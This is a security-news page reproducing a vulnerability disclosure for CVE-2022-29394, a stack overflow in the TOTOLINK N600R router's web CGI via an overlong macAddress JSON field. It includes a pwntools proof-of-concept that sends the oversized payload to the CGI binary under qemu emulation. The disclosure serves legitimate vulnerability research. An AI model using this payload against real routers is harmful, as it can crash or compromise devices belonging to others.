Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29394: IoT-vuln/Totolink/1.setWiFiAclAddConfig at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the macAddress parameter in the function FUN_0041b448.

CVE
#vulnerability#web#mac#js#wifi

The vulnerability exists in the router’s WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041b448 (at address 0x41b448) gets the json parameter macAddress but doesn’t check it’s length, a stack overflow occurs by calling strcat function directly to concatenate it into a local variables on the stack:

As can be seen from the image above, after the parameter macAddress is obtained, it is segmented with “:” and the segmented string is spliced into the local variable local_3c.

from pwn import * import json

data = { "topicurl": "setting/setWiFiAclAddConfig", "wifiIdx": "0", "addEffect": "0", "comment": "AAA", "macAddress": "A"*0x200 + “:” + "A"*0x100 + “:A:A” } data = json.dumps(data) print(data)

argv = [ "qemu-mips-static", "-L", "./lib", "-E", "LD_PRELOAD=./hook.so", "-E", "CONTENT_LENGTH={}".format(len(data)), "-E", "REMOTE_ADDR=192.168.2.1", “./cstecginew.cgi” ]

a = process(argv=argv)

a.sendline(data.encode())

a.interactive()

Related news

CVE-2022-29394: IoT-vuln/Totolink/1.setWiFiAclAddConfig at main · d1tto/IoT-vuln

TOTOLINK N600R V4.3.0cu.7647_B20210106 was discovered to contain a stack overflow via the macAddress parameter in the function FUN_0041b448.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907